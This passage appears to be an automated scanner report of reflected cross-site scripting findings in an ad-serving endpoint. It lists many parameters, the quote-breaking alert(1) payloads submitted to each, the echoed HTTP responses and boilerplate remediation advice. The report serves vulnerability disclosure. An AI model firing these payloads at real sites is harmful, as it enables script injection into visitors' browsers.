document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFo ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a397'-alert(1)-'995d035cf44 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35005"-alert(1)-"41c9df98c41 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53295'-alert(1)-'b8913ad603b was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603bhttp://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
4.8. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N4300.NYTimes/B4933145
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d553"-alert(1)-"341ef100f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6575
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "f ...[SNIP]...
4.9. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/N4300.NYTimes/B4933145
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73647'-alert(1)-'11293dd737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6571
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1849'-alert(1)-'2cc4670e0ae was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:18:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfa4"-alert(1)-"cc117967b6a was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:18:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dce1f"-alert(1)-"06f671b37b9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:18:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393c6'-alert(1)-'1d2aff2c6c1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:18:50 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d30'-alert(1)-'7905f129f26 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ca9"-alert(1)-"a08685d2013 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 340e4'-alert(1)-'7afe9285df0 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3340e4'-alert(1)-'7afe9285df0&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f591d"-alert(1)-"9e1f07ef07d was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3f591d"-alert(1)-"9e1f07ef07d&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b1aa'-alert(1)-'9131abe2505 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick6b1aa'-alert(1)-'9131abe2505&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90c03"-alert(1)-"db085e619ba was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90c03"-alert(1)-"db085e619ba&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscrip ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91c16'-alert(1)-'1145846c2df was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207291c16'-alert(1)-'1145846c2df&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2bd3"-alert(1)-"fe005cef2e0 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072e2bd3"-alert(1)-"fe005cef2e0&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "neve ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60df'-alert(1)-'060f0b2a3b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:17:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotob60df'-alert(1)-'060f0b2a3b7&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48242"-alert(1)-"d0ace12d614 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:17:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/12b/%2a/f%3B231182659%3B0-0%3B0%3B55362154%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48242"-alert(1)-"d0ace12d614&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60 ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6ea6"-alert(1)-"8c77f1839e3 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptb6ea6"-alert(1)-"8c77f1839e3&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fs ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87a2'-alert(1)-'1670f8dc654 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmptc87a2'-alert(1)-'1670f8dc654&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff51d'-alert(1)-'ce15ab17f86 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
